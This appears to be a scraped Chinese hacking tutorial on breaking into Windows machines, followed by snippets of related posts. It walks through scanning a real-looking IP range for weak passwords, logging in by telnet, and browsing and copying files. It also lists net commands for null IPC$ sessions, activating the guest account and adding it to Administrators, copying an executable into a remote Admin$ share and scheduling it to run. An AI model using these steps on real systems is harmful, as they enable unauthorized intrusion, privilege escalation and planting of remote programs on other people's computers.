系统漏洞入.侵

系统漏洞是指操作的编写存在一些缺陷或者是错误,而黑客就可以通过这个系统漏洞**计算机。
今天来讲讲系统漏洞的利用。
下载一个啊D网络工具包(这个是国内比较著名的扫描工具,功能齐全),然后记住要用外网,或者给内网做一个映射。
首先先选择IP(我填写的是218.76.40.1至218.76.40.225),然后要填写端口了。

在这里讲解一下端口普及知识
第一种是公认端口:端口号为0——1023。这些通常是绑定着一些服务的。像80端口就分配给了WEB的访问(www服务),而21端口则是分配给了FTP的这些服务。
第二种是注册端口:端口号为1024——49151。这里大家不要以为是注册账号的端口,这个完全是两码事。这种端口通常用于一些安装软件的服务,像QQ之类的软件。qq的端口我记得是4000.
第三种是动态/私有端口:端口号为49152——65535。这里我很悟不透,因为从1024之后就属于动态/私有端口了,不知道为什么这里还要再分类,只知道它的一个例外是RPC是配对着32768。

讲解完端口之后找到你要填写对方PC的端口号,但是这点你要注意,如果你要通过你填写的端口而连接对方的计算机,那么你也要开通自己的那个端口。
端口的打开方法:http://wenku.baidu.com/view/614fc470a417866fb84a8e6d.html

扫到了以后选择开始查找,这是在查找对方的账号和密码而获取若口令,像密码为123456789,这种密码就叫做弱口令,表示密码很简单。

假设我找到了192.153.1.101这个ip的账号和密码,账号为admin,密码为123。找到了以后,打开CMD指令(什么是CMD指令这个就不用说了吧,要是不知道的上网查),输入“telnet 192.153.1.101”,然后按下回车键,输入账号和密码。**成功!!!

接下来你就可以运用CMD指令对对方机子的文件进行查看,拷贝,或者添加及运行。比如输入“dir/w”,这个是查看C盘目录的指令。

附:这里要说明一下,现在XP及WIN7的计算机很难用这个方法破解了,因为微软随时发布着补丁,用补丁把系统漏洞补上之后,那个漏洞也就无用了,但是2000的机子一扫一大堆都存在漏洞。还有就是大家**的时候要好好防御自己的电脑,防止被抓。另外,我们是红客,不是骇客,请勿对他人计算机进行破坏。

在web上copy的一些命令:
==================================================================
一些常用的DOS网络命令
==================================================================
net share abc$=c:\ 将c:盘映射为 abc$ (加了“$”之后为隐藏的共享目录)
net share c$ /del 禁止C$共享
net use z: \\*.*.*.*\C$ 把 *.*.*.*(IP) 的共享 C$ 映射为本地的 Z:盘
net use c: /del 删除映射的c盘
net use * /del /y 删除全部
net start 显示本地主机当前服务
net start telnet 启动 Telnet 服务
net start Server 启动 Server 服务 (IPC$ 和共享要靠这个服务)
net stop Messenger 停止信使服务(不会在有烦人的Win的弹出广告了)!
net stop server 停止Server 服务 (关了这服务,远程的机子就不能查看你的共享和用IPC$**)
net user 得到本地主机的用户列表
net user guest /active:yes 将停用的guest帐号激活(变为可用)
net user guest 888888 把 Guest 帐号的密码改为 888888
net localgroup Administrators guest /add 把 Guest 加到Administrators组中(这样你就有了超级权限了)
net view \\*.*.*.* 查看指定IP主机上的共享
nbtstat -A *.*.*.* 得到远程主机的NetBIOS用户名列表
net share 查看本地主机的共享资源(本地的默认共享也可以看到)
net use \\*.*.*.*\ipc$ "" /user:"" 建立空连接
telnet *.*.*.* 90 连接对方机子的telnet,端口为90
ipconfig 查看本机的IP信息
**ipc过程序命令
-----------------------------------------------
net use \\*.*.*.*\ipc$ "" /user:"Administrator" 建立用户名为 Administrator 密码为空的连接
copy server1.exe \\*.*.*.*\Admin$\system32 即将当前目录下的Server1.exe复制到对方Admin$共享的System32目录内
net time \\*.*.*.* 查看远程主机的当前时间
at \\*.*.*.* 14:00 server1.exe 在对方机子添加一个在 14:00 运行 server1.exe 的任务
netstat [-r] [-s] [-n] [-a]
参数含义:
-r 显示本机路由表的内容;
-s 显示每个协议的使用状态(包括TCP协议、UDP协议、IP协议);
-n 以数字表格形式显示地址和端口;
-a 显示所有主机的端口号。
入侵

时间: 2024-08-22 00:02:40

系统漏洞入.侵的相关文章

杭州市职称系统 漏洞提示

http://hzzcpd.train.gov.cn/  杭州市职称系统 漏洞提示 漏洞报告: 邮箱找回功能暴露了ID,我们可以通过此功能进入后头 这个漏洞只是一个而已,还有很多, 希望管理员能处理, QQ 2389021558 本人没有破坏任何数据.谢谢! 如需要本人协助 18071219180  谢谢!

Hacker(20)----手动修复Windows系统漏洞

Win7系统中存在漏洞时,用户需要采用各种办法来修复系统中存在的漏洞,既可以使用Windows Update修复,也可使用360安全卫士来修复. 一.使用Windows Update修复系统漏洞 Windows Update时Microsoft公司提供的一款自动更新工具,该工具提供了漏洞补丁的安装.驱动程序和软件的升级等功能.利用Windows Update可以更新当前的系统,扩展系统的功能,让系统支持更多的软.硬件,解决各种兼容性问题,打造更安全.更稳定的系统. 1)打开控制面板 2)单击Wi

SiteServer CMS 系统漏洞 -寒龙博客

siteserver 漏洞先看简介:SiteServer CMS 网站内容管理系统(著作权登记号2008SR15710)是定位于中高端市场的CMS内容管理系统,能够以最低的成本.最少的人力投入在最短的时间内架设一个功能齐全.性能优异.规模庞大的网站平台. SiteServer CMS 是基于微软.NET 平台开发的网站内容管理系统,它集成了内容发布管理.多站点管理.定时内容采集.定时生成.多服务器发布.搜索引擎优化.流量统计等多项强大功能,独创的 STL 模板语言,通过Dreamweaver 可

Hacker(17)----认识Windows系统漏洞

Windows系统是迄今为止使用频率最高的操作系统,虽然其安全性随着版本的更新不断提高,但由于人为编写的缘故始终存在漏洞和缺陷.但Mircosoft公司通过发布漏洞补丁来提高系统的安全性,使Windows系统不再被攻破.因此,用户不仅需了解Windows操作系统的漏洞和缺陷,还需了解如何弥补这些漏洞和缺陷. Windows系统漏洞又称安全缺陷,是威胁Windows系统安全的根本原因,一旦黑客抓住这些漏洞进发起攻击,目标计算机就会被控制.用户有必要了解Windows系统产生漏洞的原因和存在的隐患.

部署系统漏洞的检测工具总结

系统上线后,对于系统的安全如何评测,此处说明几个开源的工具,一些渗透测试工具,可以检测系统,WEB站点等. 使用这些工具检查并修复,都一般的小站点的安全性提高不少 系统漏洞扫描OpenVAS http://www.openvas.org/ 可以直接下载虚拟机版本 http://www.openvas.org/vm.html 默认用户   linux系统 root/openvas, WEB系统 https://###  admin/admin g 通过这个工具可以扫描到很多的系统漏洞并根据报告的建

IOS7最新的系统漏洞

苹果近期就实用户发现了一个新iOS7系统漏洞,利用这个漏洞绕过password输入界面,在不知道password的情况下打开你近期使用的软件. 而这个过程仅仅需短短的5秒钟! 经測试,这个漏洞并没那么严重.危害也非常有限. 首先须要满足两个条件: 1.有未接来电   2.锁屏的时候是有应用在执行. 而且这个漏洞仅仅能够越权控制近期的一个应用. 操作步骤: 1.开启随意应用.锁屏. 2.激活设备并訪问控制中心,随后进入飞行模式.拉下通知中心,点击未接来电. 系统要求:iOS 7.1.1之前的系统

linux系统下放入光盘并访问光盘数据

实验01:访问光盘数据 实验目标 实现通过命令在linux上安装光盘并且访问里面的数据 实验步骤 一.环境准备 1. 放入RHEL5.9iso,打开电源 2.进入linux的主机,查看liunx系统桌面是否有RHEL5.9iso,有则说明自动挂载成功,没有则检查安装的细节 [[email protected] ~]# cd /misc/cd [[email protected] cd]# ls Cluster            README-te.html            RELEAS

看好你的门-验证机制被攻击(6)-用户角色变更系统漏洞

首先需要声明,本文纯属一个毫无远见和真才实学的小小开发人员的愚昧见解,仅供用于web系统安全方面的参考. 1. 简单说明 用户角色变更的应用,在一般的纯互联网应用中,是非常少见的.但是在一些其他的行业,比如我所熟悉的语音行业,就是非常常见的. 我们在电视里也经常看到,某某金融大鳄给经纪人打电话,这个股票,给我买入1000万:那个股票,马上现价抛出. 在这个时候,接听电话的经纪人就和金融大鳄的角色进行了变更. 2. 常见的"角色变更"的漏洞 如果我们要把自己打扮成金融大鳄,我们需要获取很

一些CMS网站系统漏洞,练手用(持续更新)

仅供拿shell,提权测试用,请勿恶意破坏 XuSoft系统: 后台万能密码:'or'='or'  可直接登陆,后台地址 /manage/login.asp inurl:ReadArticlemb.asp?id= inurl:ReadBigClassmb.asp?id= inurl:ReadBigClassmbNews.asp?id= UPUPW绿色服务器平台: 服务器基本上是2008,system权限 MySQL 默认用户名密码:root ,进入后台直接执行SQL语句写shell PHP探针-